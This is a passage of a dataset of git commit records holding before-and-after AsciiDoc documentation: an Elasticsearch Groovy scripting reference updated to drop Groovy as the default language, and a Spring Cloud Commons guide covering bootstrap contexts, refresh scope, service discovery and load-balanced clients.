index. This in-memory index doesn't support stored fields and because of that the `_source` field and\nother stored fields are not stored. This is the reason why in the `script` query the `_source` and other stored fields\naren't available.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"414625979146cadac413dfa6c81150c0d0f7b061","subject":"Groovy is no longer the default scripting language","message":"Groovy is no longer the default scripting language\n\nCloses #21208","repos":"strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc","old_file":"docs\/reference\/modules\/scripting\/groovy.asciidoc","new_file":"docs\/reference\/modules\/scripting\/groovy.asciidoc","new_contents":"[[modules-scripting-groovy]]\n=== Groovy Scripting Language\n\ndeprecated[5.0.0,Groovy will be replaced by the new scripting language <<modules-scripting-painless, `Painless`>>]\n\nGroovy is available in Elasticsearch by default. Although\nlimited by the <<java-security-manager,Java Security Manager>>, it is not a\nsandboxed language and only `file` scripts may be used by default.\n\nEnabling `inline` or `stored` Groovy scripting is a security risk and should\nonly be considered if your Elasticsearch cluster is protected from the outside\nworld. Even a simple `while (true) { }` loop could behave as a denial-of-\nservice attack on your cluster.\n\nSee <<modules-scripting-security, Scripting and Security>> for details\non security issues with scripts, including how to customize class\nwhitelisting.\n\n[float]\n=== Doc value properties and methods\n\nDoc values in Groovy support the following properties and methods (depending\non the underlying field type):\n\n`doc['field_name'].value`::\n The native value of the field. For example, if its a short type, it will be short.\n\n`doc['field_name'].values`::\n The native array values of the field. For example, if its a short type,\n it will be short[]. Remember, a field can have several values within a\n single doc. Returns an empty array if the field has no values.\n\n`doc['field_name'].empty`::\n A boolean indicating if the field has no values within the doc.\n\n`doc['field_name'].lat`::\n The latitude of a geo point type, or `null`.\n\n`doc['field_name'].lon`::\n The longitude of a geo point type, or `null`.\n\n`doc['field_name'].lats`::\n The latitudes of a geo point type, or an empty array.\n\n`doc['field_name'].lons`::\n The longitudes of a geo point type, or an empty array.\n\n`doc['field_name'].arcDistance(lat, lon)`::\n The `arc` distance (in meters) of this geo point field from the provided lat\/lon.\n\n`doc['field_name'].arcDistanceWithDefault(lat, lon, default)`::\n The `arc` distance (in meters) of this geo point field from the provided lat\/lon with a default value\n for empty fields.\n\n`doc['field_name'].planeDistance(lat, lon)`::\n The `plane` distance (in meters) of this geo point field from the provided lat\/lon.\n\n`doc['field_name'].planeDistanceWithDefault(lat, lon, default)`::\n The `plane` distance (in meters) of this geo point field from the provided lat\/lon with a default value\n for empty fields.\n\n`doc['field_name'].geohashDistance(geohash)`::\n The `arc` distance (in meters) of this geo point field from the provided geohash.\n\n`doc['field_name'].geohashDistanceWithDefault(geohash, default)`::\n The `arc` distance (in meters) of this geo point field from the provided geohash with a default value\n for empty fields.\n\n\n[float]\n=== Groovy Built In Functions\n\nThere are several built in functions that can be used within scripts.\nThey include:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Function |Description\n|`sin(a)` |Returns the trigonometric sine of an angle.\n\n|`cos(a)` |Returns the trigonometric cosine of an angle.\n\n|`tan(a)` |Returns the trigonometric tangent of an angle.\n\n|`asin(a)` |Returns the arc sine of a value.\n\n|`acos(a)` |Returns the arc cosine of a value.\n\n|`atan(a)` |Returns the arc tangent of a value.\n\n|`toRadians(angdeg)` |Converts an angle measured in degrees to an\napproximately equivalent angle measured in radians\n\n|`toDegrees(angrad)` |Converts an angle measured in radians to an\napproximately equivalent angle measured in degrees.\n\n|`exp(a)` |Returns Euler's number _e_ raised to the power of value.\n\n|`log(a)` |Returns the natural logarithm (base _e_) of a value.\n\n|`log10(a)` |Returns the base 10 logarithm of a value.\n\n|`sqrt(a)` |Returns the correctly rounded positive square root of a\nvalue.\n\n|`cbrt(a)` |Returns the cube root of a double value.\n\n|`IEEEremainder(f1, f2)` |Computes the remainder operation on two\narguments as prescribed by the IEEE 754 standard.\n\n|`ceil(a)` |Returns the smallest (closest to negative infinity) value\nthat is greater than or equal to the argument and is equal to a\nmathematical integer.\n\n|`floor(a)` |Returns the largest (closest to positive infinity) value\nthat is less than or equal to the argument and is equal to a\nmathematical integer.\n\n|`rint(a)` |Returns the value that is closest in value to the argument\nand is equal to a mathematical integer.\n\n|`atan2(y, x)` |Returns the angle _theta_ from the conversion of\nrectangular coordinates (_x_, _y_) to polar coordinates (r,_theta_).\n\n|`pow(a, b)` |Returns the value of the first argument raised to the\npower of the second argument.\n\n|`round(a)` |Returns the closest _int_ to the argument.\n\n|`random()` |Returns a random _double_ value.\n\n|`abs(a)` |Returns the absolute value of a value.\n\n|`max(a, b)` |Returns the greater of two values.\n\n|`min(a, b)` |Returns the smaller of two values.\n\n|`ulp(d)` |Returns the size of an ulp of the argument.\n\n|`signum(d)` |Returns the signum function of the argument.\n\n|`sinh(x)` |Returns the hyperbolic sine of a value.\n\n|`cosh(x)` |Returns the hyperbolic cosine of a value.\n\n|`tanh(x)` |Returns the hyperbolic tangent of a value.\n\n|`hypot(x, y)` |Returns sqrt(_x2_ + _y2_) without intermediate overflow\nor underflow.\n|=======================================================================\n","old_contents":"[[modules-scripting-groovy]]\n=== Groovy Scripting Language\n\ndeprecated[5.0.0,Groovy will be replaced by the new scripting language <<modules-scripting-painless, `Painless`>>]\n\nGroovy is the default scripting language available in Elasticsearch. Although\nlimited by the <<java-security-manager,Java Security Manager>>, it is not a\nsandboxed language and only `file` scripts may be used by default.\n\nEnabling `inline` or `stored` Groovy scripting is a security risk and should\nonly be considered if your Elasticsearch cluster is protected from the outside\nworld. Even a simple `while (true) { }` loop could behave as a denial-of-\nservice attack on your cluster.\n\nSee <<modules-scripting-security, Scripting and Security>> for details\non security issues with scripts, including how to customize class\nwhitelisting.\n\n[float]\n=== Doc value properties and methods\n\nDoc values in Groovy support the following properties and methods (depending\non the underlying field type):\n\n`doc['field_name'].value`::\n The native value of the field. For example, if its a short type, it will be short.\n\n`doc['field_name'].values`::\n The native array values of the field. For example, if its a short type,\n it will be short[]. Remember, a field can have several values within a\n single doc. Returns an empty array if the field has no values.\n\n`doc['field_name'].empty`::\n A boolean indicating if the field has no values within the doc.\n\n`doc['field_name'].lat`::\n The latitude of a geo point type, or `null`.\n\n`doc['field_name'].lon`::\n The longitude of a geo point type, or `null`.\n\n`doc['field_name'].lats`::\n The latitudes of a geo point type, or an empty array.\n\n`doc['field_name'].lons`::\n The longitudes of a geo point type, or an empty array.\n\n`doc['field_name'].arcDistance(lat, lon)`::\n The `arc` distance (in meters) of this geo point field from the provided lat\/lon.\n\n`doc['field_name'].arcDistanceWithDefault(lat, lon, default)`::\n The `arc` distance (in meters) of this geo point field from the provided lat\/lon with a default value\n for empty fields.\n\n`doc['field_name'].planeDistance(lat, lon)`::\n The `plane` distance (in meters) of this geo point field from the provided lat\/lon.\n\n`doc['field_name'].planeDistanceWithDefault(lat, lon, default)`::\n The `plane` distance (in meters) of this geo point field from the provided lat\/lon with a default value\n for empty fields.\n\n`doc['field_name'].geohashDistance(geohash)`::\n The `arc` distance (in meters) of this geo point field from the provided geohash.\n\n`doc['field_name'].geohashDistanceWithDefault(geohash, default)`::\n The `arc` distance (in meters) of this geo point field from the provided geohash with a default value\n for empty fields.\n\n\n[float]\n=== Groovy Built In Functions\n\nThere are several built in functions that can be used within scripts.\nThey include:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Function |Description\n|`sin(a)` |Returns the trigonometric sine of an angle.\n\n|`cos(a)` |Returns the trigonometric cosine of an angle.\n\n|`tan(a)` |Returns the trigonometric tangent of an angle.\n\n|`asin(a)` |Returns the arc sine of a value.\n\n|`acos(a)` |Returns the arc cosine of a value.\n\n|`atan(a)` |Returns the arc tangent of a value.\n\n|`toRadians(angdeg)` |Converts an angle measured in degrees to an\napproximately equivalent angle measured in radians\n\n|`toDegrees(angrad)` |Converts an angle measured in radians to an\napproximately equivalent angle measured in degrees.\n\n|`exp(a)` |Returns Euler's number _e_ raised to the power of value.\n\n|`log(a)` |Returns the natural logarithm (base _e_) of a value.\n\n|`log10(a)` |Returns the base 10 logarithm of a value.\n\n|`sqrt(a)` |Returns the correctly rounded positive square root of a\nvalue.\n\n|`cbrt(a)` |Returns the cube root of a double value.\n\n|`IEEEremainder(f1, f2)` |Computes the remainder operation on two\narguments as prescribed by the IEEE 754 standard.\n\n|`ceil(a)` |Returns the smallest (closest to negative infinity) value\nthat is greater than or equal to the argument and is equal to a\nmathematical integer.\n\n|`floor(a)` |Returns the largest (closest to positive infinity) value\nthat is less than or equal to the argument and is equal to a\nmathematical integer.\n\n|`rint(a)` |Returns the value that is closest in value to the argument\nand is equal to a mathematical integer.\n\n|`atan2(y, x)` |Returns the angle _theta_ from the conversion of\nrectangular coordinates (_x_, _y_) to polar coordinates (r,_theta_).\n\n|`pow(a, b)` |Returns the value of the first argument raised to the\npower of the second argument.\n\n|`round(a)` |Returns the closest _int_ to the argument.\n\n|`random()` |Returns a random _double_ value.\n\n|`abs(a)` |Returns the absolute value of a value.\n\n|`max(a, b)` |Returns the greater of two values.\n\n|`min(a, b)` |Returns the smaller of two values.\n\n|`ulp(d)` |Returns the size of an ulp of the argument.\n\n|`signum(d)` |Returns the signum function of the argument.\n\n|`sinh(x)` |Returns the hyperbolic sine of a value.\n\n|`cosh(x)` |Returns the hyperbolic cosine of a value.\n\n|`tanh(x)` |Returns the hyperbolic tangent of a value.\n\n|`hypot(x, y)` |Returns sqrt(_x2_ + _y2_) without intermediate overflow\nor underflow.\n|=======================================================================\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d99a7a40c33761f9649ce95e47107e44e91b675d","subject":"Fix property value","message":"Fix property value\n\nfix out of date property \"spring.cloud.loadbalancer.repeat-health-check\" to \"spring.cloud.loadbalancer.health-check.repeat-health-check\"","repos":"spring-cloud\/spring-cloud-commons","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-commons.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-commons.adoc","new_contents":"= Cloud Native Applications\ninclude::_attributes.adoc[]\n\ninclude::intro.adoc[]\n\n\/\/ TODO: figure out remote includes in docs and replace pasted text\n\/\/ include::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/docs\/src\/main\/asciidoc\/contributing-docs.adoc[]\nNOTE: Spring Cloud is released under the non-restrictive Apache 2.0 license.\nIf you would like to contribute to this section of the documentation or if you find an error, you can find the source code and issue trackers for the project at {docslink}[github].\n\n== Spring Cloud Context: Application Context Services\n\nSpring Boot has an opinionated view of how to build an application with Spring.\nFor instance, it has conventional locations for common configuration files and has endpoints for common management and monitoring tasks.\nSpring Cloud builds on top of that and adds a few features that many components in a system would use or occasionally need.\n\n=== The Bootstrap Application Context\n\nA Spring Cloud application operates by creating a \"`bootstrap`\" context, which is a parent context for the main application.\nThis context is responsible for loading configuration properties from the external sources and for decrypting properties in the local external configuration files.\nThe two contexts share an `Environment`, which is the source of external properties for any Spring application.\nBy default, bootstrap properties (not `bootstrap.properties` but properties that are loaded during the bootstrap phase) are added with high precedence, so they cannot be overridden by local configuration.\n\nThe bootstrap context uses a different convention for locating external configuration than the main application context.\nInstead of `application.yml` (or `.properties`), you can use `bootstrap.yml`, keeping the external configuration for bootstrap and main context nicely separate.\nThe following listing shows an example:\n\n.bootstrap.yml\n====\n----\nspring:\n application:\n name: foo\n cloud:\n config:\n uri: ${SPRING_CONFIG_URI:http:\/\/localhost:8888}\n----\n====\n\nIf your application needs any application-specific configuration from the server, it is a good idea to set the `spring.application.name` (in `bootstrap.yml` or `application.yml`).\nFor the property `spring.application.name` to be used as the application's context ID, you must set it in `bootstrap.[properties | yml]`.\n\nIf you want to retrieve specific profile configuration, you should also set `spring.profiles.active` in `bootstrap.[properties | yml]`.\n\nYou can disable the bootstrap process completely by setting `spring.cloud.bootstrap.enabled=false` (for example, in system properties).\n\n=== Application Context Hierarchies\n\nIf you build an application context from `SpringApplication` or `SpringApplicationBuilder`, the Bootstrap context is added as a parent to that context.\nIt is a feature of Spring that child contexts inherit property sources and profiles from their parent, so the \"`main`\" application context contains additional property sources, compared to building the same context without Spring Cloud Config.\nThe additional property sources are:\n\n* \"`bootstrap`\": If any `PropertySourceLocators` are found in the bootstrap context and if they have non-empty properties, an optional `CompositePropertySource` appears with high priority.\nAn example would be properties from the Spring Cloud Config Server.\nSee \"`<<customizing-bootstrap-property-sources>>`\" for how to customize the contents of this property source.\n\n* \"`applicationConfig: [classpath:bootstrap.yml]`\" (and related files if Spring profiles are active): If you have a `bootstrap.yml` (or `.properties`), those properties are used to configure the bootstrap context.\nThen they get added to the child context when its parent is set.\nThey have lower precedence than the `application.yml` (or `.properties`) and any other property sources that are added to the child as a normal part of the process of creating a Spring Boot application.\nSee \"`<<customizing-bootstrap-properties>>`\" for how to customize the contents of these property sources.\n\nBecause of the ordering rules of property sources, the \"`bootstrap`\" entries take precedence.\nHowever, note that these do not contain any data from `bootstrap.yml`, which has very low precedence but can be used to set defaults.\n\nYou can extend the context hierarchy by setting the parent context of any `ApplicationContext` you create -- for example, by using its own interface or with the `SpringApplicationBuilder` convenience methods (`parent()`, `child()` and `sibling()`).\nThe bootstrap context is the parent of the most senior ancestor that you create yourself.\nEvery context in the hierarchy has its own \"`bootstrap`\" (possibly empty) property source to avoid promoting values inadvertently from parents down to their descendants.\nIf there is a config server, every context in the hierarchy can also (in principle) have a different `spring.application.name` and, hence, a different remote property source.\nNormal Spring application context behavior rules apply to property resolution: properties from a child context override those in\nthe parent, by name and also by property source name.\n(If the child has a property source with the same name as the parent, the value from the parent is not included in the child).\n\nNote that the `SpringApplicationBuilder` lets you share an `Environment` amongst the whole hierarchy, but that is not the default.\nThus, sibling contexts (in particular) do not need to have the same profiles or property sources, even though they may share common values with their parent.\n\n[[customizing-bootstrap-properties]]\n=== Changing the Location of Bootstrap Properties\n\nThe `bootstrap.yml` (or `.properties`) location can be specified by setting `spring.cloud.bootstrap.name` (default: `bootstrap`), `spring.cloud.bootstrap.location` (default: empty) or `spring.cloud.bootstrap.additional-location` (default: empty) -- for example, in System properties.\n\nThose properties behave like the `spring.config.*` variants with the same name.\nWith `spring.cloud.bootstrap.location` the default locations are replaced and only the specified ones are used.\nTo add locations to the list of default ones, `spring.cloud.bootstrap.additional-location` could be used.\nIn fact, they are used to set up the bootstrap `ApplicationContext` by setting those properties in its `Environment`.\nIf there is an active profile (from `spring.profiles.active` or through the `Environment` API in the context you are building), properties in that profile get loaded as well, the same as in a regular Spring Boot app -- for example, from `bootstrap-development.properties` for a `development` profile.\n\n[[overriding-bootstrap-properties]]\n=== Overriding the Values of Remote Properties\n\nThe property sources that are added to your application by the bootstrap context are often \"`remote`\" (from example, from Spring Cloud Config Server).\nBy default, they cannot be overridden locally.\nIf you want to let your applications override the remote properties with their own system properties or config files, the remote property source has to grant it permission by setting `spring.cloud.config.allowOverride=true` (it does not work to set this locally).\nOnce that flag is set, two finer-grained settings control the location of the remote properties in relation to system properties and the application's local configuration:\n\n* `spring.cloud.config.overrideNone=true`: Override from any local property source.\n* `spring.cloud.config.overrideSystemProperties=false`: Only system properties, command line arguments, and environment variables (but not the local config files) should override the remote settings.\n\n=== Customizing the Bootstrap Configuration\n\nThe bootstrap context can be set to do anything you like by adding entries to `\/META-INF\/spring.factories` under a key named `org.springframework.cloud.bootstrap.BootstrapConfiguration`.\nThis holds a comma-separated list of Spring `@Configuration` classes that are used to create the context.\nAny beans that you want to be available to the main application context for autowiring can be created here.\nThere is a special contract for `@Beans` of type `ApplicationContextInitializer`.\nIf you want to control the startup sequence, you can mark classes with the `@Order` annotation (the default order is `last`).\n\nWARNING: When adding custom `BootstrapConfiguration`, be careful that the classes you add are not `@ComponentScanned` by mistake into your \"`main`\" application context, where they might not be needed.\nUse a separate package name for boot configuration classes and make sure that name is not already covered by your `@ComponentScan` or `@SpringBootApplication` annotated configuration classes.\n\nThe bootstrap process ends by injecting initializers into the main `SpringApplication` instance (which is the normal Spring Boot startup sequence, whether it runs as a standalone application or is deployed in an application server).\nFirst, a bootstrap context is created from the classes found in `spring.factories`.\nThen, all `@Beans` of type `ApplicationContextInitializer` are added to the main `SpringApplication` before it is started.\n\n[[customizing-bootstrap-property-sources]]\n=== Customizing the Bootstrap Property Sources\n\nThe default property source for external configuration added by the bootstrap process is the Spring Cloud Config Server, but you can add additional sources by adding beans of type `PropertySourceLocator` to the bootstrap context (through `spring.factories`).\nFor instance, you can insert additional properties from a different server or from a database.\n\nAs an example, consider the following custom locator:\n\n====\n[source,java]\n----\n@Configuration\npublic class CustomPropertySourceLocator implements PropertySourceLocator {\n\n @Override\n public PropertySource<?> locate(Environment environment) {\n return new MapPropertySource(\"customProperty\",\n Collections.<String, Object>singletonMap(\"property.from.sample.custom.source\", \"worked as intended\"));\n }\n\n}\n----\n====\n\nThe `Environment` that is passed in is the one for the `ApplicationContext` about to be created -- in other words, the one for which we supply additional property sources.\nIt already has its normal Spring Boot-provided property sources, so you can use those to locate a property source specific to this `Environment` (for example, by keying it on `spring.application.name`, as is done in the default Spring Cloud Config Server property source locator).\n\nIf you create a jar with this class in it and then add a `META-INF\/spring.factories` containing the following setting, the `customProperty` `PropertySource` appears in any application that includes that jar on its classpath:\n\n====\n[source]\n----\norg.springframework.cloud.bootstrap.BootstrapConfiguration=sample.custom.CustomPropertySourceLocator\n----\n====\n\n=== Logging Configuration\n\nIf you use Spring Boot to configure log settings, you should place this configuration in `bootstrap.[yml | properties]` if you would like it to apply to all events.\n\nNOTE: For Spring Cloud to initialize logging configuration properly, you cannot use a custom prefix.\nFor example, using `custom.loggin.logpath` is not recognized by Spring Cloud when initializing the logging system.\n\n=== Environment Changes\n\nThe application listens for an `EnvironmentChangeEvent` and reacts to the change in a couple of standard ways (additional `ApplicationListeners` can be added as `@Beans` in the normal way).\nWhen an `EnvironmentChangeEvent` is observed, it has a list of key values that have changed, and the application uses those to:\n\n* Re-bind any `@ConfigurationProperties` beans in the context.\n* Set the logger levels for any properties in `logging.level.*`.\n\nNote that the Spring Cloud Config Client does not, by default, poll for changes in the `Environment`.\nGenerally, we would not recommend that approach for detecting changes (although you could set it up with a\n`@Scheduled` annotation).\nIf you have a scaled-out client application, it is better to broadcast the `EnvironmentChangeEvent` to all the instances instead of having them polling for changes (for example, by using the https:\/\/github.com\/spring-cloud\/spring-cloud-bus[Spring Cloud Bus]).\n\nThe `EnvironmentChangeEvent` covers a large class of refresh use cases, as long as you can actually make a change to the `Environment` and publish the event.\nNote that those APIs are public and part of core Spring).\nYou can verify that the changes are bound to `@ConfigurationProperties` beans by visiting the `\/configprops` endpoint (a standard Spring Boot Actuator feature).\nFor instance, a `DataSource` can have its `maxPoolSize` changed at runtime (the default `DataSource` created by Spring Boot is a `@ConfigurationProperties` bean) and grow capacity dynamically.\nRe-binding `@ConfigurationProperties` does not cover another large class of use cases, where you need more control over the refresh and where you need a change to be atomic over the whole `ApplicationContext`.\nTo address those concerns, we have `@RefreshScope`.\n\n[[refresh-scope]]\n=== Refresh Scope\n\nWhen there is a configuration change, a Spring `@Bean` that is marked as `@RefreshScope` gets special treatment.\nThis feature addresses the problem of stateful beans that get their configuration injected only when they are initialized.\nFor instance, if a `DataSource` has open connections when the database URL is changed through the `Environment`, you probably want the holders of those connections to be able to complete what they are doing.\nThen, the next time something borrows a connection from the pool, it gets one with the new URL.\n\nSometimes, it might even be mandatory to apply the `@RefreshScope` annotation on some beans that can be only initialized once.\nIf a bean is \"`immutable`\", you have to either annotate the bean with `@RefreshScope` or specify the classname under the property key: `spring.cloud.refresh.extra-refreshable`.\n\nWARNING: If you hava a `DataSource` bean that is a `HikariDataSource`, it can not be\nrefreshed. It is the default value for `spring.cloud.refresh.never-refreshable`. Choose a\ndifferent `DataSource` implementation if you need it to be refreshed.\n\nRefresh scope beans are lazy proxies that initialize when they are used (that is, when a method is called), and the scope acts as a cache of initialized values.\nTo force a bean to re-initialize on the next method call, you must invalidate its cache entry.\n\nThe `RefreshScope` is a bean in the context and has a public `refreshAll()` method to refresh all beans in the scope by clearing the target cache.\nThe `\/refresh` endpoint exposes this functionality (over HTTP or JMX).\nTo refresh an individual bean by name, there is also a `refresh(String)` method.\n\nTo expose the `\/refresh` endpoint, you need to add following configuration to your application:\n\n====\n[source,yaml]\n----\nmanagement:\n endpoints:\n web:\n exposure:\n include: refresh\n----\n====\n\nNOTE: `@RefreshScope` works (technically) on a `@Configuration` class, but it might lead to surprising behavior.\nFor example, it does not mean that all the `@Beans` defined in that class are themselves in `@RefreshScope`.\nSpecifically, anything that depends on those beans cannot rely on them being updated when a refresh is initiated, unless it is itself in `@RefreshScope`.\nIn that case, it is rebuilt on a refresh and its dependencies are re-injected.\nAt that point, they are re-initialized from the refreshed `@Configuration`).\n\n=== Encryption and Decryption\n\nSpring Cloud has an `Environment` pre-processor for decrypting property values locally.\nIt follows the same rules as the Spring Cloud Config Server and has the same external configuration through `encrypt.\\*`.\nThus, you can use encrypted values in the form of `{cipher}*`, and, as long as there is a valid key, they are decrypted before the main application context gets the `Environment` settings.\nTo use the encryption features in an application, you need to include Spring Security RSA in your classpath (Maven co-ordinates: `org.springframework.security:spring-security-rsa`), and you also need the full strength JCE extensions in your JVM.\n\ninclude::jce.adoc[]\n\n=== Endpoints\n\nFor a Spring Boot Actuator application, some additional management endpoints are available. You can use:\n\n* `POST` to `\/actuator\/env` to update the `Environment` and rebind `@ConfigurationProperties` and log levels.\n To enabled this endpoint you must set `management.endpoint.env.post.enabled=true`.\n* `\/actuator\/refresh` to re-load the boot strap context and refresh the `@RefreshScope` beans.\n* `\/actuator\/restart` to close the `ApplicationContext` and restart it (disabled by default).\n* `\/actuator\/pause` and `\/actuator\/resume` for calling the `Lifecycle` methods (`stop()` and `start()` on the `ApplicationContext`).\n\nNOTE: If you disable the `\/actuator\/restart` endpoint then the `\/actuator\/pause` and `\/actuator\/resume` endpoints\nwill also be disabled since they are just a special case of `\/actuator\/restart`.\n\n== Spring Cloud Commons: Common Abstractions\n\nPatterns such as service discovery, load balancing, and circuit breakers lend themselves to a common abstraction layer that can be consumed by all Spring Cloud clients, independent of the implementation (for example, discovery with Eureka or Consul).\n\n[[discovery-client]]\n=== The `@EnableDiscoveryClient` Annotation\n\nSpring Cloud Commons provides the `@EnableDiscoveryClient` annotation.\nThis looks for implementations of the `DiscoveryClient` and `ReactiveDiscoveryClient` interfaces with `META-INF\/spring.factories`.\nImplementations of the discovery client add a configuration class to `spring.factories` under the `org.springframework.cloud.client.discovery.EnableDiscoveryClient` key.\nExamples of `DiscoveryClient` implementations include https:\/\/cloud.spring.io\/spring-cloud-netflix\/[Spring Cloud Netflix Eureka], https:\/\/cloud.spring.io\/spring-cloud-consul\/[Spring Cloud Consul Discovery], and https:\/\/cloud.spring.io\/spring-cloud-zookeeper\/[Spring Cloud Zookeeper Discovery].\n\nSpring Cloud will provide both the blocking and reactive service discovery clients by default.\nYou can disable the blocking and\/or reactive clients easily by setting `spring.cloud.discovery.blocking.enabled=false` or `spring.cloud.discovery.reactive.enabled=false`.\nTo completely disable service discovery you just need to set `spring.cloud.discovery.enabled=false`.\n\nBy default, implementations of `DiscoveryClient` auto-register the local Spring Boot server with the remote discovery server.\nThis behavior can be disabled by setting `autoRegister=false` in `@EnableDiscoveryClient`.\n\nNOTE: `@EnableDiscoveryClient` is no longer required.\nYou can put a `DiscoveryClient` implementation on the classpath to cause the Spring Boot application to register with the service discovery server.\n\n==== Health Indicators\n\nCommons auto-configures the following Spring Boot health indicators.\n\n===== DiscoveryClientHealthIndicator\nThis health indicator is based on the currently registered `DiscoveryClient` implementation.\n\n* To disable entirely, set `spring.cloud.discovery.client.health-indicator.enabled=false`.\n* To disable the description field, set `spring.cloud.discovery.client.health-indicator.include-description=false`.\nOtherwise, it can bubble up as the `description` of the rolled up `HealthIndicator`.\n* To disable service retrieval, set `spring.cloud.discovery.client.health-indicator.use-services-query=false`.\nBy default, the indicator invokes the client's `getServices` method. In deployments with many registered services it may too\ncostly to retrieve all services during every check. This will skip the service retrieval and instead use the client's `probe` method.\n\n===== DiscoveryCompositeHealthContributor\nThis composite health indicator is based on all registered `DiscoveryHealthIndicator` beans. To disable,\nset `spring.cloud.discovery.client.composite-indicator.enabled=false`.\n\n==== Ordering `DiscoveryClient` instances\n`DiscoveryClient` interface extends `Ordered`. This is useful when using multiple discovery\n clients, as it allows you to define the order of the returned discovery clients, similar to\nhow you can order the beans loaded by a Spring application. By default, the order of any `DiscoveryClient` is set to\n`0`. If you want to set a different order for your custom `DiscoveryClient` implementations, you just need to override\nthe `getOrder()` method so that it returns the value that is suitable for your setup. Apart from this, you can use\nproperties to set the order of the `DiscoveryClient`\nimplementations provided by Spring Cloud, among others `ConsulDiscoveryClient`, `EurekaDiscoveryClient` and\n`ZookeeperDiscoveryClient`. In order to do it, you just need to set the\n`spring.cloud.{clientIdentifier}.discovery.order` (or `eureka.client.order` for Eureka) property to the desired value.\n\n==== SimpleDiscoveryClient\n\nIf there is no Service-Registry-backed `DiscoveryClient` in the classpath, `SimpleDiscoveryClient`\ninstance, that uses properties to get information on service and instances, will be used.\n\nThe information about the available instances should be passed to via properties in the following format:\n`spring.cloud.discovery.client.simple.instances.service1[0].uri=http:\/\/s11:8080`, where\n`spring.cloud.discovery.client.simple.instances` is the common prefix, then `service1` stands\nfor the ID of the service in question, while `[0]` indicates the index number of the instance\n(as visible in the example, indexes start with `0`), and then the value of `uri` is\nthe actual URI under which the instance is available.\n\n=== ServiceRegistry\n\nCommons now provides a `ServiceRegistry` interface that provides methods such as `register(Registration)` and `deregister(Registration)`, which let you provide custom registered services.\n`Registration` is a marker interface.\n\nThe following example shows the `ServiceRegistry` in use:\n\n====\n[source,java,indent=0]\n----\n@Configuration\n@EnableDiscoveryClient(autoRegister=false)\npublic class MyConfiguration {\n private ServiceRegistry registry;\n\n public MyConfiguration(ServiceRegistry registry) {\n this.registry = registry;\n }\n\n \/\/ called through some external process, such as an event or a custom actuator endpoint\n public void register() {\n Registration registration = constructRegistration();\n this.registry.register(registration);\n }\n}\n----\n====\n\nEach `ServiceRegistry` implementation has its own `Registry` implementation.\n\n* `ZookeeperRegistration` used with `ZookeeperServiceRegistry`\n* `EurekaRegistration` used with `EurekaServiceRegistry`\n* `ConsulRegistration` used with `ConsulServiceRegistry`\n\nIf you are using the `ServiceRegistry` interface, you are going to need to pass the\ncorrect `Registry` implementation for the `ServiceRegistry` implementation you\nare using.\n\n\n==== ServiceRegistry Auto-Registration\n\nBy default, the `ServiceRegistry` implementation auto-registers the running service.\nTo disable that behavior, you can set:\n* `@EnableDiscoveryClient(autoRegister=false)` to permanently disable auto-registration.\n* `spring.cloud.service-registry.auto-registration.enabled=false` to disable the behavior through configuration.\n\n===== ServiceRegistry Auto-Registration Events\n\nThere are two events that will be fired when a service auto-registers. The first event, called\n`InstancePreRegisteredEvent`, is fired before the service is registered. The second\nevent, called `InstanceRegisteredEvent`, is fired after the service is registered. You can register an\n`ApplicationListener`(s) to listen to and react to these events.\n\nNOTE: These events will not be fired if the `spring.cloud.service-registry.auto-registration.enabled` property is set to `false`.\n\n==== Service Registry Actuator Endpoint\n\nSpring Cloud Commons provides a `\/service-registry` actuator endpoint.\nThis endpoint relies on a `Registration` bean in the Spring Application Context.\nCalling `\/service-registry` with GET returns the status of the `Registration`.\nUsing POST to the same endpoint with a JSON body changes the status of the current `Registration` to the new value.\nThe JSON body has to include the `status` field with the preferred value.\nPlease see the documentation of the `ServiceRegistry` implementation you use for the allowed values when updating the status and the values returned for the status.\nFor instance, Eureka's supported statuses are `UP`, `DOWN`, `OUT_OF_SERVICE`, and `UNKNOWN`.\n\n[[rest-template-loadbalancer-client]]\n=== Spring RestTemplate as a Load Balancer Client\n\nYou can configure a `RestTemplate` to use a Load-balancer client.\nTo create a load-balanced `RestTemplate`, create a `RestTemplate` `@Bean` and use the `@LoadBalanced` qualifier, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n @LoadBalanced\n @Bean\n RestTemplate restTemplate() {\n return new RestTemplate();\n }\n}\n\npublic class MyClass {\n @Autowired\n private RestTemplate restTemplate;\n\n public String doOtherStuff() {\n String results = restTemplate.getForObject(\"http:\/\/stores\/stores\", String.class);\n return results;\n }\n}\n----\n====\n\nCAUTION: A `RestTemplate` bean is no longer created through auto-configuration.\nIndividual applications must create it.\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe BlockingLoadBalancerClient is used to create a full physical address.\n\nIMPORTANT: To use a load-balanced `RestTemplate`, you need to have a load-balancer implementation in your classpath.\nAdd <<spring-cloud-loadbalancer-starter, Spring Cloud LoadBalancer starter>> to your project in order to use it.\n\n[[webclinet-loadbalancer-client]]\n=== Spring WebClient as a Load Balancer Client\n\nYou can configure `WebClient` to automatically use a load-balancer client.\nTo create a load-balanced `WebClient`, create a `WebClient.Builder` `@Bean` and use the `@LoadBalanced` qualifier, as follows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n\t@Bean\n\t@LoadBalanced\n\tpublic WebClient.Builder loadBalancedWebClientBuilder() {\n\t\treturn WebClient.builder();\n\t}\n}\n\npublic class MyClass {\n @Autowired\n private WebClient.Builder webClientBuilder;\n\n public Mono<String> doOtherStuff() {\n return webClientBuilder.build().get().uri(\"http:\/\/stores\/stores\")\n \t\t\t\t.retrieve().bodyToMono(String.class);\n }\n}\n----\n====\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe Spring Cloud LoadBalancer is used to create a full physical address.\n\nIMPORTANT: If you want to use a `@LoadBalanced WebClient.Builder`, you need to have a load balancer\nimplementation in the classpath. We recommend that you add the\n<<spring-cloud-loadbalancer-starter, Spring Cloud LoadBalancer 